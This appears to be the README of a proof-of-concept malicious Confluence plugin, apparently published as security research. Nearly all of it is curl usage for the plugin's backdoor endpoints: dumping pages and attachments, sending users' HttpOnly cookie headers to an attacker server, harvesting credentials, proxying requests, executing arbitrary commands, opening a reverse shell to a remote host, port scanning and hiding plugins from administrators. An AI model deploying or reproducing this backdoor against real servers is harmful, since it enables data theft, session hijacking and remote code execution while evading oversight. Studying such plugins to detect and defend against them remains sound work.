A PoC for a malicious Confluence plugin. Read more about this on our blog.
The general code may also work with slight adjustments in Jira but the plugin cannot be directly installed into Jira.
curl "http://yourserver/rest/maintenance/latest/listattachments?accesskey=<Access Key>"
curl "http://yourserver/rest/maintenance/latest/getattachment?accesskey=<Access Key>&id=<Attachment ID>" -O
curl "http://yourserver/rest/maintenance/latest/listpages?accesskey=<Access Key>"
curl "http://yourserver/rest/maintenance/latest/getpage?accesskey=<Access Key>&id=<Page ID>"
Since the cool cookies have HttpOnly set, this works by first sending a request to the custom endpoint /getheaders, which returns all headers base64 encoded into the DOM. Those are then sent to the attacker.
# Configure the server which will receive POST requests of users containing base64 encoded headers
curl "http://yourserver/rest/maintenance/latest/headerexfilconfig?accesskey=<Access Key>&url=<base64 encoded target URL>&enabled={TRUE,FALSE}"python3 headerserver.py
python3 credsserver.py
curl "http://yourserver/rest/maintenance/latest/proxy?accesskey=<Access Key>&method={GET,POST}&url=<base64 encoded URL>&headers=<base64 encoded headers (name1:value1,nameN:valueN)>&body=<base64 encoded body for POST>"
curl "http://yourserver/rest/maintenance/latest/exec?accesskey=<Access Key>&cmd=<Command to run>&args=<arg1,arg2,arg3>"
curl "http://yourserver/rest/maintenance/latest/revshell?accesskey=<Access Key>&rhost=<Remote Host>&rport=<Remote Port>"
curl "http://yourserver/rest/maintenance/latest/portscan?accesskey=<Access Key>&ip=<IP address>"
curl "http://yourserver/rest/maintenance/latest/hideplugins?accesskey=<Access Key>&plugins=<com.plugin.hideme,com.plugin.hidemeto>&enabled={TRUE,FALSE}"